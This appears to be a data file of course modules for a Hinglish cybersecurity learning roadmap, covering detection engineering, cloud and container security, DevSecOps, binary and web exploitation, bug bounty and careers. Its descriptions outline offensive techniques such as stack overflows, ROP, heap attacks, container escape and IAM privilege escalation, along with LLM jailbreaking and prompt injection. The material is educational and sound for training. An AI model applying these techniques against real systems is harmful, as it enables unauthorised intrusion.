  { id: "blue-09", phase: "Phase 9: Blue Team & SOC Analyst", category: "Detection", title: "Detection Engineering & Sigma Rules", level: "advanced", order: 9, description: "Detection engineering — systematic approach to creating effective detections. Sigma rules — SIEM-agnostic YAML format. Sigma structure: title, status, logsource (product/service/category), detection (keywords/conditions), falsepositives, level. Sigma to Splunk/ELK/QRadar conversion (sigmac, pySigma). MITRE ATT&CK coverage mapping — which techniques you can detect. YARA rules — file/memory pattern detection. Snort/Suricata network rules. Detection lifecycle — create, test, tune, retire. False positive rate vs detection rate tradeoff. Atomic Red Team — simulate attacks to test detections. Alert quality over quantity." },
  { id: "blue-10", phase: "Phase 9: Blue Team & SOC Analyst", category: "Tools", title: "EDR, Honeypots & Deception Technology", level: "advanced", order: 10, description: "EDR solutions: CrowdStrike Falcon, Microsoft Defender for Endpoint (MDE), SentinelOne, Carbon Black, Cortex XDR. EDR capabilities: behavioral detection, process tree, memory scanning, network blocking, response actions. EDR bypass techniques (red team perspective) — why blue team must understand. Honeypots: low-interaction (Honeyd), high-interaction (actual services). CanaryTokens (free) — Word docs, URLs, AWS keys, DNS. Honeyfiles — track file access. Honey credentials — fake accounts monitored. Deception platforms — Attivo, CounterCraft. Using honeypots for threat intelligence." },

  // ═══════════════════════════════════════════════════════════
  // PHASE 10: CLOUD & DEVSECOPS
  // ═══════════════════════════════════════════════════════════
  { id: "cloud-01", phase: "Phase 10: Cloud Security", category: "Cloud Basics", title: "Cloud Security Fundamentals", level: "beginner", order: 1, description: "Cloud models: IaaS, PaaS, SaaS. Public/Private/Hybrid/Multi-cloud. Shared responsibility model — provider vs customer. AWS vs Azure vs GCP service comparison. Cloud security concepts: IAM, encryption at rest/transit, logging, network controls. Cloud advantages aur new risks — misconfigurations. Top cloud breaches — Capital One (SSRF + overpermissive IAM), AWS bucket leaks. Cloud threat actors. Cloud-native attacks vs traditional attacks. Cloud penetration testing authorization requirements. CSA Cloud Controls Matrix. Well-Architected Framework (security pillar)." },
  { id: "cloud-02", phase: "Phase 10: Cloud Security", category: "AWS", title: "AWS Security — Pentesting & Hardening", level: "advanced", order: 2, description: "AWS core services security: IAM (users, roles, policies, least privilege), S3 (bucket policies, ACLs, public access block), EC2 (security groups, metadata service), Lambda, VPC (NACLs vs security groups). S3 misconfiguration — public buckets, server-side encryption. IAM privilege escalation paths — iam:PassRole, ec2:RunInstances, lambda:CreateFunction. SSRF → IMDS (IMDSv1 vs IMDSv2). AWS CLI: configure, s3 ls, iam list-users, sts get-caller-identity. Recon tools: ScoutSuite, Prowler (800+ checks), Pacu (exploitation). CloudTrail — logging aur analysis. GuardDuty — threat detection. AWS Security Hub." },
  { id: "cloud-03", phase: "Phase 10: Cloud Security", category: "Containers", title: "Docker & Kubernetes Security", level: "advanced", order: 3, description: "Docker security risks: privileged containers (root on host!), exposed Docker socket (/var/run/docker.sock), host volume mounts, capability escalation. Container escape techniques. Docker hardening: non-root user (USER directive), read-only filesystem, --no-new-privileges, resource limits, seccomp profiles. Image scanning: Trivy, Clair, Snyk, Grype. Kubernetes risks: RBAC misconfigurations, exposed kubelet API (10250), etcd (no auth — keys to kingdom!), privileged pods. K8s security tools: kube-hunter, kubeaudit, kube-bench (CIS). Secrets management — Vault, sealed secrets. Network policies. Pod Security Standards." },
  { id: "cloud-04", phase: "Phase 10: Cloud Security", category: "DevSecOps", title: "DevSecOps — Secure CI/CD Pipeline", level: "advanced", order: 4, description: "DevSecOps = security shift left — development process mein integrate. CI/CD platforms: GitHub Actions, GitLab CI, Jenkins, CircleCI. Pipeline security stages: SAST (code analysis — Semgrep, SonarQube, CodeQL), SCA (dependency scanning — Snyk, Dependabot, OWASP Dependency-Check), DAST (running app scan — OWASP ZAP), Container scanning, Secret scanning (GitLeaks, TruffleHog pre-commit). SBOM (Software Bill of Materials) — Log4Shell lesson. IaC scanning: Checkov, tfsec, Terrascan. Supply chain security — SLSA framework. Signed commits aur artifacts. Pipeline poisoning attacks." },
  { id: "cloud-05", phase: "Phase 10: Cloud Security", category: "IaC", title: "Infrastructure as Code Security", level: "advanced", order: 5, description: "IaC tools: Terraform (most popular), Ansible, AWS CloudFormation, Pulumi. Common misconfigurations: world-open security groups (0.0.0.0/0 anywhere), unencrypted EBS/S3, public databases, missing CloudTrail, overpermissive IAM roles, disabled MFA delete. IaC scanning: Checkov (supports Terraform, CF, K8s, Dockerfile), tfsec, Bridgecrew, Terrascan. Terraform state file security — contains plaintext sensitive data, use remote backend with encryption. Policy as Code — OPA (Open Policy Agent), HashiCorp Sentinel. Drift detection — Terraform plan in CI. GitOps security." },

  // ═══════════════════════════════════════════════════════════
  // PHASE 11: ADVANCED EXPLOITATION
  // ═══════════════════════════════════════════════════════════
  { id: "adv-01", phase: "Phase 11: Advanced Hacking", category: "Binary Exploit", title: "Buffer Overflow — Stack Based Exploitation", level: "advanced", order: 1, description: "Stack layout — local vars, saved EBP, return address. Buffer overflow concept — ret address overwrite karna. EIP control steps: fuzzing (send increasing As), finding offset (pattern_create/pattern_offset, msf-pattern_create), bad characters identify karna, finding jump point (!mona jmp -r esp), shellcode inject. Immunity Debugger + Mona.py workflow. GDB PEDA/pwndbg. Exploit structure: [padding] + [EIP/RIP] + [NOP sled] + [shellcode]. 64-bit vs 32-bit differences. Protections: ASLR, Stack Canaries, DEP/NX, PIE. Basic bypass — ret2libc. Practice: VulnServer, Brainpan, SLMail." },
  { id: "adv-02", phase: "Phase 11: Advanced Hacking", category: "Binary Exploit", title: "Return-Oriented Programming (ROP)", level: "advanced", order: 2, description: "ROP — DEP/NX bypass without shellcode. Gadgets — small code sequences ending in 'ret'. ROP chain — gadgets ki string. ROPgadget, ropper, pwntools ROP module. Ret2libc — system('/bin/sh') call karna. x64 calling convention — registers: RDI, RSI, RDX (arguments). pop rdi; ret gadget. ASLR bypass techniques: info leak, partial overwrite, brute force (small ASLR). Stack pivoting — alternate stack. ret2plt — PLT entries reuse. GOT overwrite. ret2dlresolve. SROP (Sigreturn ROP). ret2csu. Practice: ROP Emporium challenges. CTF pwn challenges." },
  { id: "adv-03", phase: "Phase 11: Advanced Hacking", category: "Binary Exploit", title: "Heap Exploitation Fundamentals", level: "advanced", order: 3, description: "ptmalloc2 — glibc heap allocator. Chunk structure: size, flags (PREV_INUSE, IS_MMAPPED), fd, bk. Bins: tcache (glibc 2.26+), fast bins, small bins, large bins, unsorted bin. Vulnerabilities: use-after-free (UAF), double-free, heap overflow, off-by-one. Tcache poisoning — arbitrary write primitive. fastbin dup. Unsorted bin attack. House of Force, House of Spirit, House of Orange. Heap feng shui. GLIBC version matters — same exploit different behavior. Tools: pwndbg heap commands (heap, bins, chunks). pwntools. Practice: pwn.college, pwnable.kr." },
  { id: "adv-04", phase: "Phase 11: Advanced Hacking", category: "Reverse Engineering", title: "Reverse Engineering — Ghidra & x64dbg", level: "advanced", order: 4, description: "RE goals: malware analysis, license bypass (CrackMe), vulnerability research. Static RE tools: Ghidra (NSA, free, powerful decompiler), IDA Pro (industry standard + Hex-Rays decompiler), Binary Ninja, Radare2/Cutter. Dynamic RE: x64dbg (Windows), GDB + PEDA/pwndbg (Linux). Reading decompiled output — naming variables, functions. Identifying encryption routines, network code, file operations. Anti-analysis: IsDebuggerPresent, timing checks, VM detection, junk code, control flow obfuscation. Unpacking — UPX, custom packers. Keygen challenges. CrackMe platforms: crackmes.one, reversing.kr." },
  { id: "adv-05", phase: "Phase 11: Advanced Hacking", category: "Advanced Web", title: "Advanced Web Exploitation Research", level: "advanced", order: 5, description: "HTTP desync/request smuggling (CL.TE, TE.CL) — cache poisoning, request hijacking. Web cache poisoning vs cache deception. DOM clobbering — breaking JS with HTML. Prototype pollution to RCE — AST injection. SSTI research — new template engines. GraphQL — introspection leak, batching DoS, nested query abuse. Subdomain takeover — expired CNAME targets (GitHub Pages, Heroku, Azure). Race conditions — concurrent requests timing attacks (TOCTOU). Deserialization gadget hunting — ysoserial. OAuth advanced attacks — PKCE bypass, JWT confusion. Browser exploitation concepts — V8 engine vulnerabilities." },

  // ═══════════════════════════════════════════════════════════
  // PHASE 12: BUG BOUNTY & CAREER
  // ═══════════════════════════════════════════════════════════
  { id: "bb-01", phase: "Phase 12: Bug Bounty & Jobs", category: "Bug Bounty", title: "Bug Bounty Hunting — Getting Started", level: "intermediate", order: 1, description: "Bug bounty platforms: HackerOne, Bugcrowd, Intigriti, Synack (invite-only), YesWeHack. VDP (Vulnerability Disclosure Program) vs paid bug bounty. Scope reading — in-scope vs out-of-scope. Severity tiers: P1 (Critical) to P5 (Informational). Payout ranges — $50 to $100,000+. Duplicate reports — most frustrating part. Hall of fame recognition. Starting strategy: large programs with broad scope, old domains, mobile apps. Methodology: asset discovery → recon → testing → report. Program choice — balance between competition and payout. Setting realistic expectations." },
  { id: "bb-02", phase: "Phase 12: Bug Bounty & Jobs", category: "Bug Bounty", title: "Bug Bounty Recon & Automation", level: "advanced", order: 2, description: "Recon pipeline: subfinder/amass → dnsx → httpx → naabu → nuclei. Tools: subfinder, amass, assetfinder (subdomains), massdns (DNS resolution), httpx (live hosts + tech detection), naabu (port scan), gau/waybackurls (historical URLs), hakrawler, katana (crawling), ffuf (fuzzing), Arjun (parameter discovery). JS analysis: LinkFinder, SecretFinder. GitHub recon — target organization repos. Nuclei templates — mass vulnerability scanning. Axiom — distributed scanning cloud. Continuous monitoring — new assets, new changes. Notify integration — alert on changes." },
  { id: "bb-03", phase: "Phase 12: Bug Bounty & Jobs", category: "Bug Bounty", title: "Writing Effective Bug Reports", level: "intermediate", order: 3, description: "Good report = fast triage + good payout. Title format: '[Vulnerability Type] in [Location] allows [Impact]'. Sections: Summary, Steps to Reproduce (numbered, exact), Impact (technical + business), PoC (screenshots, video, working exploit), Affected URL/Parameter, CVSS score, Suggested fix. Business impact samjhao — 'attacker can read all user emails' > 'reflected XSS found'. Video PoC for complex bugs. CVSS v3.1 calculator. Communication etiquette — professional, patient. Follow-up after 2 weeks. Handling duplicates gracefully. Triage team relationship. Writeup after fix." },
  { id: "bb-04", phase: "Phase 12: Bug Bounty & Jobs", category: "Certifications", title: "Cybersecurity Certifications — Complete Guide", level: "beginner", order: 4, description: "Entry level: CompTIA Security+ (globally recognized), Network+, eJPT (practical, beginner friendly), SSCP. Offensive: CEH (theoretical, Pearson Vue), OSCP (most respected, 24hr practical exam, $1499), OSWP (wireless), OSEP (advanced persistent threats), CRTP/CRTE (Active Directory, affordable). Defensive/Blue Team: CCD (Certified Cyber Defender), GCFA, GCFE, GCIA, Blue Team Labs Online certs. Cloud: AWS Security Specialty, Google PCSE, Azure SC-200. Management: CISSP ($700, 5yr experience), CISM, CISA. India-specific: NIELIT courses. Exam preparation resources." },
  { id: "bb-05", phase: "Phase 12: Bug Bounty & Jobs", category: "Career", title: "Cybersecurity Career Paths in India", level: "beginner", order: 5, description: "Top roles: SOC Analyst (most openings), Penetration Tester, AppSec Engineer, Malware Analyst, Threat Intelligence, Security Engineer, DevSecOps, Cloud Security, Forensic Investigator, Bug Bounty Hunter (freelance), CISO. Salary ranges (2024): Fresher SOC L1 (3-6 LPA), Jr Pentester (5-10 LPA), Mid-level (10-25 LPA), Senior (25-50 LPA), CISO (50-1.5 Cr). Hiring: TCS, Infosys, Wipro, Accenture, IBM, Deloitte, KPMG, PwC, CDAC, DRDO, MHA, startups. Job boards: LinkedIn, Naukri, Instahyre, InfoSec Jobs. Remote work opportunities. Freelancing platforms." },
  { id: "bb-06", phase: "Phase 12: Bug Bounty & Jobs", category: "Career", title: "Building Your Security Portfolio & Brand", level: "beginner", order: 6, description: "Portfolio strategy — proof of skills banana. GitHub: security tools, automation scripts, CTF solutions, CVE research. Technical blog: Medium, Substack, ya personal site — writeups publish karo. CTF hall of fame — PicoCTF, HTB, THM rankings. Bug bounty HoF — program acknowledgements. LinkedIn optimization: skills, certifications, projects, recommendations. Twitter/X — security community (#infosec, #bugbounty, #ctf). YouTube — tutorials, CTF walkthroughs. Conference talks: null India, c0c0n, BSides, OWASP India chapters. Open source contributions. Mentoring juniors." },
  { id: "bb-07", phase: "Phase 12: Bug Bounty & Jobs", category: "Future", title: "AI in Cybersecurity — Future Skills", level: "intermediate", order: 7, description: "AI changing cybersecurity landscape — both defense aur offense. Defensive AI: anomaly detection (behavioral analytics), malware classification (ML models), threat prediction, automated phishing detection, AI-powered SIEM correlation. Offensive AI: LLM-generated spear phishing (undetectable quality), AI-powered fuzzing, automated vulnerability discovery, deepfake video/audio social engineering. LLM vulnerabilities: prompt injection (system prompt leak), jailbreaking, data poisoning, model inversion. Security tools using AI: Darktrace, Vectra AI, CrowdStrike Falcon. Using ChatGPT/Claude for security — code review, payload generation, research. Future: AI agents for automated pentesting." },

];
